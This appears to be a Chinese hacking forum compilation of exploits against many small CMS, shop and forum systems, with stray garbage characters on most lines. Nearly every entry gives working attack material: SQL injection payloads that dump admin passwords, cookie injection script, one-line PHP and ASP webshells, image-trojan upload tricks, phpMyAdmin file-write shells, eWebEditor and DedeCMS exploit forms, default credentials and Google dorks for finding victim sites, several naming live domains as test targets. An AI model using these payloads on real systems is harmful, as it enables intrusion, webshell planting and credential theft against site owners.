启航企业建站系统 cookie注入漏洞通杀所有版本
9 S' ?; ?; T3 b+ z
0 A# T# a9 \/ M直接上exploit:
- M+ W* L6 ?, }) Zjavascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin")); C0 L. {- r! e5 h1 t
test:http://www.tb11.net/system/xitong/shownews.asp?id=210
4 U+ u8 u: s N--------------------------------------------------------------------------------------------------------------------------------------------------------------------------8 c6 G' T# X" A5 O# o$ W
Asprain论坛 注册用户 上传图片就可拿到webshell, ^/ H5 N$ D7 f; _/ X5 y! C$ g+ v
* ~8 _, r; g! _6 }8 R( }Asprain是一个适合于各中小学、中专、技校、职高建设校园论坛、师生交流论坛,一些教科研部门、公司企业建设内部论坛、IT技术爱好者建设技术交流论坛的免费论坛程序。9 Q6 s+ ^5 q; h5 j8 P2 w
1.txt存放你的一句话马 如:<%execute(request("cmd"))%>5 I) J0 J" _& _3 d1 ` ~( v
2.gif 为一小图片文件,一定要小,比如qq表情图片
: P" a& X, n4 _1 F3 |. A3:copy /b 2.gif+1.txt 3.gif 这样就伪造了文件头,但是现在传上去还不行,我接下来就用, R8 x' y3 m/ {$ m
4:copy /b 3.gif+2.gif 4.asp ok,现在文件头和文件尾都是正常的图片文件了4 G1 c4 ]- Y, J
5.q.asp;.gif
8 V7 j" I5 |4 U( b. z" y! Fgoogle:Powered by Asprain2 t5 q, T4 r3 `/ I) U
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
7 z4 @ @, y" y: Q! w8 d
9 }5 d+ s; M$ JShopNum1全部系统存在上传漏洞。
! `6 z& ~* r) D) y; A3 A' x9 R$ D% Z# h$ _/ e) m
首先 在 http://www.shopnum1.com/product.html 页面查看任意产品详细说明。
$ s4 D0 H3 D& H I7 [5 ]2 {按说明 提示登录后台。。
! o* u# `* `& g* Q1 g, E, Q在后台功能页面->附件管理->附件列表: z* n: v2 C4 b. [% J
可以直接上传.aspx 后缀木马6 m& s! X3 \2 J+ f" P( y
http://demo.shopnum1.com/upload/20110720083822500.aspx3 c! `3 h! Y( v. @* @5 j6 Q/ y
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
+ E. T1 K2 Y; S, i z# S; S
) z5 H# Y. s$ t; ]: h* j牛牛CMS中小企业网站管理系统 上传漏洞
* n7 L; h; B& ?: @* q9 M7 j) A6 a8 ]+ r
牛牛CMS是中企商铺网专为中小企业网站开发的网站管理系统。
$ M8 q; J" Q. _) O: S0 _后台:admin/login.asp
0 P0 m5 D: o2 M. newebeditor 5.5 Nday
, p' F( X1 q' c! Z+ F1 Rexp:
0 x; o9 Y% b& r1 z+ x; M<form?action="http://www.lz5188.net/Admin/WebEditor168/asp/upload.asp?action=save&type=image&style=popup&cusdir=Mr.DzY.asp"?method=post?name=myform?enctype="multipart/form-data">?
9 G2 F6 z9 G) @' z2 t<input?type=file?name=uploadfile?size=100><br><br>?5 O4 h3 G0 M, O5 x& S' a
<input?type=submit?value=upload>?
- l4 G- {6 R# f</form>
; C Z7 a* k# q! S- }# @. a+ Gps:先上传小马.
1 r7 M9 l$ q, u4 q( Q, N6 Yinurl:member/Register.asp 您好,欢迎来到立即注册立即登录设为首页加入收藏* j+ c7 W& v- A% n; H) [+ ]
$ Q4 N0 b3 _$ Y9 B2 S( q! S1 x
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------$ X3 s5 K$ C- g3 {0 I. A
% f1 f8 S4 D4 P9 D. G0 fYothCMS 遍历目录漏洞
! l5 u# W( b9 c/ a( \* n1 [" T5 o# B4 Y3 V/ \
优斯科技企业网站管理系统(YothCMS)是一款完全开源免费的CMS。* R' o2 k( R- g- I2 z" w
默认后台:admin/login.asp
5 o: Y' ? t* N/ U遍历目录:9 ]/ z1 h" C' R/ N$ G
ewebeditor/manage/upload.asp?id=1&dir=../, y' j$ t" L) Y; G: Q
data:# ]& S9 T. L8 J, b, V9 i( |& L
http://www.flycn.net/%23da%23ta%23\%23db_%23data%23%23.asa
+ P4 K8 t- Z( H* w6 ` B8 v0 g--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
' G( K3 }2 m; V' v# l8 ~
d6 a. J& F" F" I4 R+ ~Net112企业建站系统 1.0
, N/ ?0 {' U% x* s& T, }+ c' ^; Q3 u' s1 _2 b" F3 }
源码简介:
; d N* s' d; u1 GNet112企业建站系统,共有:新闻模块,产品模块,案例模块,下载模块,相册模块,招聘模块,自定义模块,友情链接模块 八大模块。
& w$ @1 @, o g. f( q- ]5 p7 a( a添加管理员:
3 h2 h$ L* { D' uhttp://www.0855.tv/admin/admin.asp?action=add&level=2
, u, W; ?- t% y) b) l3 |其实加不加都不是很重要,后台文件都没怎么作验证。
: a- N. n2 X5 g% Q8 E# R( S$ c6 w9 @上传路径:5 f/ I8 Y- l S( k6 S
http://www.0855.tv/inc/Upfile.as ... 0&ImgHeight=200
5 P& B1 \& Y @, x0 j1 s$ H2 Ahttp://www.0855.tv/inc/Upfile.asp?Stype=2/ T5 N m1 H" w0 m0 ^2 l0 x
怎么利用自己研究。
# Z- {; U9 z( |/ E# O) M' l遍历目录: l: g$ M7 M* o. q
http://www.0855.tv/admin/upfile.asp?path=../... V5 E8 a% ~* t& s% v. R
如:4 X. ]5 S, o$ h' T# N
http://www.0855.tv/admin/upfile.asp?path=../admin
. W/ }* E- P7 t5 |8 D mhttp://www.0855.tv/admin/upfile.asp?path=../data
" _- x1 u) h- [ O: e: {--------------------------------------------------------------------------------------------------------------------------------------------------------------------------* B; ~( s5 T- j7 k
3 h- p7 m' K* f7 V8 n* x5 |. Z; Q& m易和阳光购物商城通杀 上传漏洞
# B8 \7 }& H$ X( g V( r% D/ ?* F7 R! J+ N! s4 q! x" o3 r
前提要求是IIS6.0+asp坏境。
9 X0 O; z6 ?# C/ w& a# ]( I漏洞文件Iheeo_upfile.asp ' E6 d- G) P% m7 G1 b# H
过滤不严.直接可以iis6.0上传3 Q# Y4 P& h4 C& F
把ASP木马改成0855.asp;1.gif
$ g1 b' v5 h$ b: f4 D3 d4 |直接放到明小子上传
* c, k1 a9 F' m# O& C! yGoogle搜索:inurl:product.asp?Iheeoid=% m+ d- w; W) P% m3 _# v8 J
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------7 a% S' g# X$ x- Y# X$ h4 ?, q
5 a+ C) n) W" Fphpmyadmin后台4种拿shell方法
( k9 f/ p! _' W2 J/ V% l7 a
" ]3 }2 N- Z& y6 v; G方法一:# [4 `% C/ V6 f0 F) Y# G
CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );9 d! M- F( }/ Y$ R* V
INSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>');' A; h3 S$ s8 T6 C
SELECT xiaomaFROM study INTO OUTFILE 'E:/wamp/www/7.php';
/ ?4 C) U8 T- j; S9 g: Z3 g----以上同时执行,在数据库: mysql 下创建一个表名为:xiaoma,字段为xiaoma1,导出到E:/wamp/www/7.php
3 x) o5 X, O8 d$ {# B一句话连接密码:xiaoma
: S% S" r5 |; P7 y U1 a方法二:
( E# H7 Y* u& ^& r4 VCreate TABLE xiaoma (xiaoma1 text NOT NULL);
, Z* N! a& k8 Z9 y! r5 w$ jInsert INTO xiaoma (xiaoma1) VALUES('<?php eval($_POST[xiaoma])?>');3 b, e4 p% f k$ Y
select xiaoma1 from xiaoma into outfile 'E:/wamp/www/7.php';
$ b3 b8 Y% R; oDrop TABLE IF EXISTS xiaoma;- X' |7 w7 S3 T9 {& q# Y" J
方法三:- a9 P3 a" ?# k, a% z4 F) u0 C/ o
读取文件内容: select load_file('E:/xamp/www/s.php');) V. s+ e, x5 Z" M7 H8 b
写一句话:select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/xiaoma.php'
( ]- f( h4 T9 f& V @, Ccmd执行权限:select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
2 S) b3 k5 v' \7 A; _. }4 P方法四:# I: E' y9 {6 w/ b
select load_file('E:/xamp/www/xiaoma.php');
' w) B1 u* ~5 M. p3 { }select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
% a3 a; I9 u, ] @" z然后访问网站目录:http://www.xxxx.com/xiaoma.php?cmd=dir
) P$ @3 l0 H Q& c--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
9 ~# g/ x; I6 c6 z, }. s, b9 d: }. u; _0 T' ] _& `
传信网络独立开发网站源码0day漏洞
* g0 q4 P( b: L8 y' I. @+ U9 ?, S z; |% ~8 c9 e" H4 R8 |9 A
后台system/login.asp* a9 v" e' A9 F6 C; ~) n
进了后台有个ewebeditor
0 U+ J3 H, E. `" e$ C; s7 j, mGoogle 搜索inurl:product1.asp?tyc=& h; `+ a% E% @4 B- d
编辑器漏洞默认后台ubbcode/admin_login.asp- G1 S5 L U2 C; V: h
数据库ubbcode/db/ewebeditor.mdb
0 H* \, R. b, @) o. F' ^& z6 w R默认账号密码yzm 111111
# v2 D5 |0 Q N: J0 M0 e, p. [$ l
' s5 b' F. W% M4 B: z1 l2 h9 k拿webshell方法
5 j+ N, T+ ~% y& a1 } p% Y登陆后台点击“样式管理”-选择新增样式 4 @2 z+ O5 Q; ?; @& m+ X
样式名称:scriptkiddies 随便写
7 z/ { r, }, N% X; [# Y7 c* c: M路径模式:选择绝对路径
! E$ g$ X. w1 i1 j图片类型:gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx
5 S$ r7 u' U# }) ]: D0 A图片类型比如就是我们要上传的ASP木马格式' r0 T$ {7 r" u5 x# p6 f+ Z: E
上传路径:/
! t0 }2 s* B- R9 Z- S" a图片限制:写上1000 免的上不了我们的asp木马
# q. Z+ @ B) q; u7 @* A1 v% O上传内容不要写
$ s' W# @+ h1 \, E2 \可以提交了 7 v# F+ r& \- v7 ?4 j5 j6 D/ S
样式增加成功! # `( l2 K2 ]% E+ U! K5 g
返回样式管理 找到刚才添加的样式名称 然后按工具栏 在按新增工具栏
( c' z5 X- {, l( r% k& F- C按钮设置 在可选按钮 选择插入图片然后按》 -然后保存设置3 t, Y$ H6 t: X5 o, X3 H% Y
网页地址栏直接输入ubbcode/Upload.asp?action=save&type=&style=scriptkiddies6 N: E6 ?$ ?9 Z7 N4 P
上ASP木马 回车 等到路径) D; s. k0 ]' l
+ q i$ o7 V& d% v* [# b后台:system/login.asp2 i) j c6 a- S- b( y, v
Exp:' D- f* I3 n* g8 E$ F
and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master: a2 F4 L0 e4 @
测试:
7 I/ H2 a/ y) V: b% x+ R: Yhttp://www.zjgaoneng.com/product_show.asp?id=9 and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master
7 h# Z; v4 o1 `- Nhttp://www.yaerli.com/product_show.asp?id=245 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14 from master
, T7 U( E0 M5 V-------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ~; Y& P4 | m7 P' U0 t# G, C
, c" J0 V5 z4 V8 |0 v7 Vfoosun 0day 最新注入漏洞/ l2 P! ?) T) n) J, j
) |2 Z6 t1 F, ]8 {; ?" Z) m( t
漏洞文件:www.xxx.com/user/SetNextOptions.asp
) z( U4 \, ?3 w$ ^4 B0 f+ r利用简单的方法:! p; h( Q; e% x) N- {1 ?
暴管理员帐号:3 p; t2 n# k- L9 G+ N5 Q, c5 t
http://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin
, A5 E' \( f. B% H4 n! a* {暴管理员密码:4 _* I) z+ Y7 M7 E s
http://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_pass_word,
3 s) B7 V/ g% G; A3 `--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
9 f, V/ L" ]% B% v+ T9 S. z, [$ r: A. k, s
网站程序的版权未知!
0 {7 u1 l7 B2 W( G: Q/ R: a8 _2 ^' Y* m |' X7 m
默认网站数据库:
* I' p+ B1 w1 O: w. iwww.i0day.com/data/nxnews.mdb4 p8 V) c, L# r' q* W/ R
ewebeditor 在线编辑器:
, u4 M# U- c2 |3 R1 Q# @( I编辑器数据库下载地址:www.i0day.com/ewebeditor/db/ewebeditor.mdb3 {% @4 E5 [' x: n) z, k" A! t
登录地址:ewebeditor/admin_login.asp
0 m4 k. G6 D# [) K1 O5 f2 Q默认密码:admin admin5 j- i& W1 g7 z5 p- F
登陆后可遍历目录:ewebedtior/admin_uploadfile.asp?id=22&dir=../../data
# b, T( [+ Q9 u/ W1 R' U) u0 ]
" t" }$ t6 ^; L' P/ ^# P8 iSql注入漏洞:
1 X0 S2 Q" g: n( }8 q) |* Z9 q3 ahttp://www.i0day.com/detail.asp?id=12; G; ?4 |( ~3 f6 |1 P6 W# K+ M
exp:' h2 W: U) p7 U* H3 e
union select 1,admin,password,4,5,6,7,8 from admin
% q9 V, E$ r1 p8 E. {8 o5 A爆出明文帐号/密码
# z. _ h( X/ f+ R
: g" d: ]% l- C% B2 }6 C上传漏洞:
5 ]: ~% _& T9 X' L& }后台+upfile.asp
5 y1 l8 O, u7 V如:
9 i7 }# w3 }5 N. P7 Shttp://www.i0day.com/manage/upfile.asp 可以用工具。如明小子。
/ q. ]$ x6 ?" \( Bshell的地址:网址+后台+成功上传的马
( F7 M6 v& M* m# H) Ogoogle:inurl:news.asp?lanmuName=
5 z/ c. ^/ f/ K------------------------------------------------------------------------------------------------------------------------------------------------------------------------3 L) e3 ^/ M" i- P2 Q
5 K7 ~+ k8 v# ^( mdedecms最新0day利用不进后台直接拿WEBSHELL. ~( U0 r* @$ z# y: y
( Y& T& k3 ^+ m' h; P; T
拿webshell的方法如下:8 @2 q! G. Z* W+ C2 S
网传的都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell.
' K1 v) A, g/ O2 x5 d! ?前题条件,必须准备好自己的dede数据库,然后插入数据:1 D: {/ ]: V* Y' S5 k! c
insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}'); 7 F7 @) V6 E( H9 J) p# m. S) [
( Q9 _" U7 }) k, e
再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。
7 C) N* K8 B* C3 b<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();">
2 A1 v7 ]1 ?# n' n9 [7 h<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />( j( {+ z L7 A* ]9 ^! q
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
( x. U, t* L) }0 p: E<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />! d5 X6 V8 \, v. J
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
3 n" \4 v5 f- t5 G- } D<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />4 d. E$ J/ E6 h
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
6 h/ g1 Z# B4 N<input type="text" value="true" name="nocache" style="width:400">1 N+ @/ G0 Y% d3 B
<input type="submit" value="提交" name="QuickSearchBtn"><br />" s" X6 z5 {) C+ M( d
</form>
6 F1 e. ~: [! r# G0 ]8 d3 d<script>
5 M ]+ z) C7 E: E6 K, a! `function addaction()
/ W/ z# K4 ]8 D- P* i( k{
4 a0 A0 F2 N% K! z3 ^" e# Odocument.QuickSearch.action=document.QuickSearch.doaction.value;! c* G& U% i9 v* r" a' _% r" [
}
' g2 E3 U' G5 W X8 c</script>- `, n/ {2 W4 ~: l$ u) O
-----------------------------------------------------------------------------------------------------------------------------------------------2 v/ \% o1 _; x6 A3 H
2 O0 q7 ~( V" v* N q6 Zdedecms织梦暴最新严重0day漏洞" m1 H/ a# M, a4 _" T
bug被利用步骤如下:
& \. O/ t8 Y" d+ T# B3 u2 |4 shttp://www.2cto.com /网站后台/login.php?dopost=login&validate={dcug}&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
' x8 u' U* f7 B1 }' Y$ _把上面{}上的字母改为当前的验证码,即可直接进入网站后台。8 F+ l( Z6 ~5 {
-------------------------------------------------------------------------------------------------------------------------------------------6 \) g) t* j# B, Q) a2 |
5 q) B* c: K% J1 T
多多淘宝客程序上传漏洞 7 j B- f8 y1 R/ b6 F& W
漏洞页面:
+ v8 k% j6 c/ p8 S# oadmin\upload_pic.php6 a m! I, j; J7 D6 {
传送门:
& S8 t# u& ]3 x) ]" X7 Ghttp://www.www.com/admin/upload_pic.php?uploadtext=slide1
: ^4 ?2 }* U" F) v& PPS:copy张图片马 直接 xxx.php 上传抓包地址!# Z( v# k7 d |4 K7 k
------------------------------------------------------------------------------------------------------------------------------------------------------# g* e# A: _& X! r% z- O6 p
% H: B' V7 H( d7 S/ `4 u
无忧公司系统ASP专业版后台上传漏洞1 l8 p0 D( B5 _5 X3 L; y6 m& ?/ A! Q
漏洞文件 后台上传3 j1 \# e: G* Z4 y/ M; [' C
admin/uploadPic.asp: [/ u" X0 u. I% [) F4 R
漏洞利用 这个漏洞好像是雷池的0 s9 [0 M/ u6 G& }! [. O+ {
http://forum.huc08.com/admin/upl ... ptkiddies.asp;& upload_code=ok&editImageNum=1
/ d* }$ B6 p, L等到的webshell路径:
* \. p9 C4 c7 T/ r/UploadFiles/scriptkiddies.asp;_2.gif
, v9 m5 s5 n; g4 Z---------------------------------------------------------------------------------------------------------------------------------------------------) g' M. X, X0 s, h
& `4 u. j% ]! U% N K
住哪酒店分销联盟系统2010
; L E- A3 M) b' Y! P2 T- C: TSearch:
, X8 s6 q) W! N5 ~3 Hinurl:index.php?m=hotelinfo* D" Q- J4 S; S; {& M9 ^0 v
http://forum.huc08.com /index.php?m=liansuohotel&cityid=53%20and%201=2%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10%20from%20zhuna_admin9 r2 R( W1 m7 s/ k0 R- I
默认后台:index.php?m=admin/login% y3 h6 p- y2 s+ R* @1 G; N8 b
--------------------------------------------------------------------------------------------------------------------------------------------------
# E0 y0 q7 z+ K: r, P" f6 n- H9 S' Y
inurl:info_Print.asp?ArticleID=$ f' e3 v/ z: I4 T
后台 ad_login.asp. H# A) x Z3 N" }
爆管理员密码:
6 G m! M. c8 H. j4 | A9 M" yunion select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin
, ~! p z$ k N; `# k( |------------------------------------------------------------------------------------------------------------------------------------------------------------
4 K% N+ P$ g9 A; o8 q7 `# \3 y7 @/ P" @# }4 U
搜索框漏洞!
0 |0 `1 C/ X% _# i$ O3 O%' and 1=2 union select 1,admin,3,4,5,6,password,8,9,10 from admin where '%'=') T3 J5 g D# Q5 J1 K' ]5 }
--------------------------------------------------------------------------------------------------------------------------------------------------------
3 @0 }$ t$ e( ]8 o; Z! c% v+ K* w n# ~$ W: E9 ^
关键字:
+ K+ x& L1 M$ u9 E) hinurl:/reg_TemletSel.asp?step=2# W5 P7 d# ^, Y, |6 D& V
或者
9 R! |, s8 t1 w8 K电子商务自助建站--您理想的助手
+ K9 b* z; b* ?' g2 Q3 [! _3 n-------------------------------------------------------------------------------------------------------------------------------------------------
# _4 E3 Y9 ~2 Z. u4 [1 j* V1 \0 h0 B) R [6 M
iGiveTest 2.1.0注入漏洞1 ^$ x6 }8 @# k+ Z+ J' o3 v2 i Z
Version: <= 2.1.0& a' j: E! ]% K9 q% ]8 N- G9 f! o, _
# Homepage: http://iGiveTest.com/
7 S1 O3 t @1 J谷歌关键字: “Powered by iGiveTest”
. M1 S/ I* P+ e9 ^' g q随便注册一个帐号。然后暴管理员帐号和密码2 ^0 h. J3 H1 T, c/ L, E: i
http://www.xxxx.com/users.php?ac ... r=-1&userids=-1) union select 1,concat(user_name,0x3a,user_passhash),user_email,user_firstname,user_lastname,6,7 from users,groups where (1
9 B X: Q# p! ^! s$ u5 G------------------------------------------------------------------------------------------------------------------------------------------------1 m% w1 O( s0 X( j5 C# F
) ^( A" Z& k, n, |CKXP网上书店注入漏洞
& H5 P0 p3 |, b5 \. l2 H O4 s/ h工具加表:shop_admin 加字段:admin& M9 h& D8 N. \+ H
后台:admin/login.asp 1 J5 Z: A+ l( y! _6 w
登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/
& c, ?! f: k3 F6 `; f( F; ainurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息# a7 P F- L. k& T, ]7 ?7 n- Q
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------3 d% ^) c$ t& o+ C. k- ]) ~
K2 Q. _) ^3 G4 R段富超个人网站系统留言本写马漏洞
2 l8 P4 w5 U- T: ]3 V源码下载:http://www.mycodes.net/24/2149.htm/ b3 Q- I% c! h; k; i; c
addgbook.asp 提交一句话。: G1 }6 ]5 B( D2 s4 n
连接: http://www.xxxx.tv/date/date3f.asp
0 ` G" p8 Z- I Lgoogle:为防批量,特略!
5 G8 y1 _0 b. Z H! I( D-------------------------------------------------------------------------------------------------------------------------------------------------------------------------
) M5 P( a- Y% v; R- \ N& D1 n
7 {7 d5 l. i- L1 o d) d智有道专业旅游系统v1.0 注入及列目录漏洞) d K0 S" ^7 C A5 V) G( @
默认后台路径:/admin/login.asp* k6 G. M# y: Y+ }9 D2 v) A; u
默认管理员:admin2 @& C4 _7 T5 @
默认密码:123456
4 }2 h5 H0 ~$ d" CSQL EXP Tset:
! Z% j/ x# l- d$ j% [http://www.untnt.com/info/show.asp?id=90 union select 1,userid,3,4,5,userpsw,7,8,9,10,11,12,13,14,15 from admin
9 P# U' Y' j- {! k- s5 L( |------------------------------------------------------------------------------------------------------------------------------------------------------------------------3 c- a$ O' _6 z% | P3 h. U* D8 n$ Y
) U; ~. N3 [6 n+ N: y9 rewebeditor(PHP) Ver 3.8 本任意文件上传0day! x# d g; q% t( s
EXP:3 }# U' g* e6 m" L7 b9 f" E
<title>eWebeditoR3.8 for php任意文件上EXP</title>3 j. u) w- E, A" `- ?+ h. m. a# ?
<form action="" method=post enctype="multip
3 \7 A0 }% ]8 z9 M2 C8 M& r7 Iart/form-data">
) x0 G8 z9 o i( y2 V<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="512000"> 8 |& I8 T& O# p$ w
URL:<input type=text name=url value="http://www.untnt.com/ewebeditor/" size=100><br>
8 X3 l# m3 e- F/ _. x1 I- ]1 \<INPUT TYPE="hidden" name="aStyle[12]" value="toby57|||gray|||red|||../uploadfile/|||550|||350|||php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office|||1|||zh-cn|||0|||500|||300|||0|||...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1">
4 D, o% d1 @5 Z6 ]- v/ E1 kfile:<input type=file name="uploadfile"><br>
3 B6 ~' W, I s& y( |, _<input type=button value=submit onclick=fsubmit()>
5 q* K; I, B% p0 c& e) P7 @4 K</form><br>
. g" H6 k, {8 {<script> - J# Y5 i# H/ D6 ?+ {2 K3 i- n0 L
function fsubmit(){
" g" d7 w( `/ h& z9 B# Bform = document.forms[0];
7 l% \: V! N+ p Kform.action = form.url.value+''php/upload.php?action=save&type=FILE&style=toby57&language=en'';
9 w: r. k# v; ~8 l' G9 j7 i# x4 o" dalert(form.action); : t. \ _ Y7 {2 v9 `# v5 T
form.submit();
4 z" m |0 ? M3 `8 N}
: G- v% T4 {0 ~( r8 v</script>
1 J+ y6 {' j" c, N注意修改里面ewebeditor的名称还有路径。
/ f# D. x ^/ j4 R---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
, R9 t! \# I9 ^* y. `6 r7 `: F( k; L e, t7 N( @' U& r1 ~
提交’时提示ip被记录 防注入系统的利用! T: V( ^+ s, d c- v
网址:http://www.xxx.com/newslist.asp?id=122′
: q- B2 C0 h b. ?6 P+ _0 l+ v提示“你的操作已被记录!”等信息。
- Q1 I# l6 _$ c4 g利用方法:www.xxx.com/sqlin.asp看是否存在,存在提交http://www.xxx.com/newslist.asp?id=122‘excute(request("TNT"))写入一句话。) s8 D- w0 d G; Z0 V l. a0 f
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------" a( {. U9 Z5 _% s& q4 y' H; @8 r
+ |6 P0 H) x6 L" R) |/ d* M西部商务网站管理系统 批量拿shell-0day
0 u+ H* w) V" M这站用的是SQL通用防注入程序 V3.0,恩,这东西可不好绕,我记得当初我有写过一个文章 通过提交一句话直接拿shell的..唯一的前提是存储记录ip的数据库必须是.asp或.asa才行..看了下sqlin.mdb 1 U; A; C" z) W7 s" h; ^- J
1:admin_upset.asp 这个文件有个设置上传后缀的地方.. 很简单,它直接禁止了asp,asa.aspx 还有个cer可以利用嘛
) X- R# E6 |: U$ l7 L2:同样是admin_upset.asp 这个文件不是入库的 他是直接在htmleditor目录生成个config.asp文件...Ok不用多说,插个一句话搞定...注意闭合
6 m# i3 w p- l1 M, N/ |) Y7 o3:admin_bakup.asp 备份数据库的..但是得本地构造...调用了filesystemobject 怎么利用就不强调了..IIS的bug大家都懂1 T8 T3 B" }, q$ p: }7 \
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
2 g; o7 e: K" j$ M; K
4 d. ^. p" V/ U* CJspRun!6.0 论坛管理后台注入漏洞
! ~+ F3 t5 z9 x" o7 T% U9 X X+ s: _, s5 S+ l8 x& j" A# E9 s8 ?
SEBUG-ID:20787 发布时间:2011-04-30 影响版本:: i4 @, C- e! e1 K0 I# @2 O" \
JspRun!6.0 - J; \8 A5 ~+ O. ^% B, Z' m) d O8 D
漏洞描述:8 M U: A/ F# u/ C6 Q N* {8 H
JspRun!论坛管理后台的export变量没有过滤,直接进入查询语句,导致进行后台,可以操作数据库,获取系统权限。
% v$ w' a1 ^' C/ }! `# C% D1 x在处理后台提交的文件中ForumManageAction.java第1940行
! |. @: r, P/ q+ kString export = request.getParameter("export");//直接获取,没有安全过滤1 E, r- e3 B o) ^
if(export!=null){
8 T! I. A/ Z+ d. PList> styles=dataBaseService.executeQuery("SELECT s.name, s.templateid, t.name AS tplname, t.directory, t.copyright FROM jrun_styles s LEFT JOIN jrun_templates t ON t.templateid=s.templateid WHERE styleid='"+export+"'");//进入查询语,执行了.... B$ F9 {0 r5 M8 R4 K/ a
if(styles==null||styles.size()==0){: S# x/ Q4 D1 z3 v! X/ `
<*参考. U* C+ h* \. x+ }0 j* w
nuanfan@gmail.com# v5 F6 b6 L/ a6 i7 E' i; c
*> SEBUG安全建议:
9 y8 ?" D6 W* w, P# Gwww.jsprun.net
3 G9 `! N; Q; t: s/ q(1)安全过滤变量export
8 d1 t, e3 {7 y n2 \' I5 l W2 e: D(2)在查询语句中使用占位符
0 c1 ^# m/ Q! Y0 }------------------------------------------------------------------------------------------------------------------------------------------------------------------------------! f* d) [2 ^2 C
( q1 d, Y3 g5 a* O* K
乌邦图企业网站系统 cookies 注入$ V/ ^) Y. ^& F! c7 V5 @
- T! k$ ^( g! `
程序完整登陆后台:/admin/login.asp: |. o. K- L8 Z. @0 b; i
默认登陆帐号:admin 密码:admin8882 {: C7 S7 o% ~1 `0 T
语句:(前面加个空格)# K6 {. u2 L) G
and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin
7 Q, P8 r% n4 Z+ d) L或者是16个字段:
/ }1 w4 }" o. t, E& Fand 1=2 union select 1,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16 from admin7 t- k2 g* e' T( v- |' n% H" S
爆不出来自己猜字段。 J, O& o% R, _
注入点:http://www.untnt.com/shownews.asp?=88# }9 G8 t# P/ q" |! F: q# G
getshell:后台有备份,上传图片小马。备份名:a.asp 访问 xxx.com/databakup/a.asp8 V# R3 E! t3 F n+ D: [# l$ R
关键字:! X2 y, k4 d4 z, b, c5 R9 e' E
inurl:shownews?asp.id=
$ o4 Y( |, w4 v$ D: s2 r-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------8 Y. Y5 A( n2 A; A0 u
! R% @3 _% s1 b/ E7 {
CKXP网上书店注入漏洞
. _% Z* A9 B" N0 i" ^8 |
7 a% h4 i" @3 d工具加表:shop_admin 加字段:admin
9 ?- {4 B6 f7 P2 [7 L7 ~% W后台:admin/login.asp
2 x: p2 }! W+ `8 B+ i' F0 L登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/
9 i1 t4 Q# b9 ?: Jinurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息. j' K: u* q9 M
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------5 l' d- g+ z* c. k L y X* z
) B/ a& ?3 ^6 A' P( b% u" O! V
YxShop易想购物商城4.7.1版本任意文件上传漏洞. @8 F5 R9 S( Z N, O$ s+ B8 A
* C4 b9 x9 p7 y; G) \
